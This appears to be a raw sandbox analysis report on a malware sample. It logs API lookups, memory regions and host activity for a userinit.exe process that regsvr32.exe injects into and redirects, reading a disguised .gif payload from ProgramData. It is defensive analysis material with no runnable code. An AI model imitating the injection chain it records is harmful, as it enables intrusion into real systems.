Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d75266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d752542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d751d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d75238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7520c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d751fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d751e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d751f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d751ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d75216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7522be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7521e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8220ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8220b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8220c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8220d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #42: userinit.exe

222

0

»

Information	Value
ID	#42
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:37, Reason: Child Process
Unmonitor	End Time: 00:02:41, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0x174
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 6E4 0x 8BC 0x 8C0

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x00187fff	Pagefile Backed Memory	r	-
private_0x0000000000190000	0x00190000	0x00190fff	Private Memory	rw	-
private_0x00000000001a0000	0x001a0000	0x001a0fff	Private Memory	rwx	-
pagefile_0x00000000001b0000	0x001b0000	0x001b6fff	Pagefile Backed Memory	r	-
private_0x00000000001c0000	0x001c0000	0x001cffff	Private Memory	rw	-
pagefile_0x00000000001d0000	0x001d0000	0x001d1fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x001e0000	0x001e0fff	Memory Mapped File	r	-
private_0x00000000001f0000	0x001f0000	0x001f0fff	Private Memory	rwx	-
pagefile_0x0000000000200000	0x00200000	0x00201fff	Pagefile Backed Memory	r	-
private_0x0000000000210000	0x00210000	0x0024ffff	Private Memory	rw	-
pagefile_0x0000000000250000	0x00250000	0x00350fff	Pagefile Backed Memory	r	-
private_0x0000000000360000	0x00360000	0x003dffff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
private_0x0000000000470000	0x00470000	0x0056ffff	Private Memory	-	-
private_0x0000000000570000	0x00570000	0x005f0fff	Private Memory	rw	-
private_0x0000000000570000	0x00570000	0x005f4fff	Private Memory	rw	-
private_0x0000000000570000	0x00570000	0x005f8fff	Private Memory	rw	-
private_0x0000000000570000	0x00570000	0x005fcfff	Private Memory	rw	-
private_0x0000000000570000	0x00570000	0x00600fff	Private Memory	rw	-
private_0x0000000000570000	0x00570000	0x00604fff	Private Memory	rw	-
private_0x0000000000570000	0x00570000	0x00608fff	Private Memory	rw	-
private_0x0000000000570000	0x00570000	0x0060cfff	Private Memory	rw	-
private_0x0000000000570000	0x00570000	0x00610fff	Private Memory	rw	-
private_0x0000000000570000	0x00570000	0x00614fff	Private Memory	rw	-
private_0x0000000000570000	0x00570000	0x00618fff	Private Memory	rw	-
private_0x0000000000570000	0x00570000	0x0061cfff	Private Memory	rw	-
private_0x0000000000620000	0x00620000	0x0062ffff	Private Memory	rw	-
private_0x0000000000630000	0x00630000	0x0072ffff	Private Memory	rw	-
private_0x0000000000730000	0x00730000	0x008fffff	Private Memory	rw	-
pagefile_0x0000000000730000	0x00730000	0x0080efff	Pagefile Backed Memory	r	-
private_0x0000000000810000	0x00810000	0x00892fff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x00896fff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x0089afff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x0089efff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x008a2fff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x008a6fff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x008aafff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x008aefff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x008b2fff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x008b6fff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x008bafff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x008befff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x008fffff	Private Memory	rw	-
private_0x0000000000900000	0x00900000	0x00a4ffff	Private Memory	rw	-
private_0x0000000000900000	0x00900000	0x00a0cfff	Private Memory	rw	-
private_0x0000000000a10000	0x00a10000	0x00a4ffff	Private Memory	rw	-
private_0x0000000000a50000	0x00a50000	0x00b4ffff	Private Memory	rw	-
private_0x0000000000b50000	0x00b50000	0x00d4ffff	Private Memory	rw	-
userinit.exe	0x00d80000	0x00d88fff	Memory Mapped File	rwx	-
pagefile_0x0000000000d90000	0x00d90000	0x0198ffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01990000	0x022bffff	Memory Mapped File	r	-
pagefile_0x00000000022c0000	0x022c0000	0x026b2fff	Pagefile Backed Memory	r	-
private_0x00000000026c0000	0x026c0000	0x02770fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x02774fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x02778fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x0277cfff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x02782fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x02786fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x0278afff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x0278efff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x02794fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x02798fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x0279cfff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027a2fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027a6fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027aafff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027aefff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027b4fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027b8fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027bcfff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027c2fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027c6fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027cafff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027cffff	Private Memory	-	-
private_0x0000000002780000	0x02780000	0x02832fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02836fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0283afff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0283efff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02854fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02858fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0285cfff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02860fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x02876fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x0287afff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x0287efff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x02894fff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x02898fff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x0289cfff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x028a0fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028b6fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028bafff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028befff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028d4fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028d8fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028dcfff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x02900fff	Private Memory	rw	-
private_0x0000000002870000	0x02870000	0x02942fff	Private Memory	rw	-
private_0x0000000002880000	0x02880000	0x02960fff	Private Memory	rw	-
private_0x00000000028b0000	0x028b0000	0x029a2fff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x029c0fff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029f2fff	Private Memory	rwx	-
private_0x0000000002a00000	0x02a00000	0x02afffff	Private Memory	-	-
private_0x0000000002b40000	0x02b40000	0x02b7ffff	Private Memory	rw	-
private_0x0000000002c20000	0x02c20000	0x02d1ffff	Private Memory	rw	-
sortdefault.nls	0x02d20000	0x02feefff	Memory Mapped File	r	-
olepro32.dll	0x6d790000	0x6d7a8fff	Memory Mapped File	rwx	-
comctl32.dll	0x6d7b0000	0x6d833fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd6000	0x7ffd6000	0x7ffd6fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 21 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffd6008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0x6e4, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d790000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d7b0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = ,î$, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d7e266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d7e2542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d7e1d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d7e238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7e20c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d7e1fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d7e1e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d7e1f0f	2	Fn
